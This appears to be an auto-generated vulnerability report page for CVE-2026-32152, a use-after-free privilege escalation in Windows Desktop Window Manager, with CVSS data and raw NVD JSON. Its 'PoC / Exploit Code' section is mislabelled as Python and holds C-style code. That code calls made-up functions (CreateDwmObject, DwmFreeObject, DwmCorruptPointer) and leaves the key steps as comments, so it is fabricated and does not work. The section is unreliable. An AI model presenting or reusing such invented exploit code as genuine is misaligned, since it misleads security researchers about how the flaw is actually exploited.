Security Vulnerability Report
中文
CVE-2026-32152 CVSS 7.8 HIGH

CVE-2026-32152

Published: 2026-04-14 18:17:16
Last Modified: 2026-04-17 15:10:36

Description

Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microsoft Windows(具体受影响版本请参考Microsoft安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <dwmapi.h> // PoC Concept for CVE-2026-32152 // Note: This is a conceptual structure to demonstrate the UAF trigger logic. // Actual exploitation requires specific memory layout manipulation. void trigger_exploit() { // 1. Obtain a handle to the DWM object HANDLE hDwm = CreateDwmObject(); // 2. Setup malicious data for reallocation (Heap Spray) printf("[*] Preparing memory layout..."); // 3. Trigger the free operation in DWM printf("[*] Triggering Use-After-Free..."); DwmFreeObject(hDwm); // 4. Attempt to reuse the freed pointer // If the timing is right, this pointer now points to attacker-controlled data printf("[*] Attempting to corrupt memory via dangling pointer..."); DwmCorruptPointer(hDwm); printf("[+] Exploit trigger attempt finished."); } int main() { trigger_exploit(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32152", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:15.710", "lastModified": "2026-04-17T15:10:35.607", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32152", "source": "[email protected]"}]}}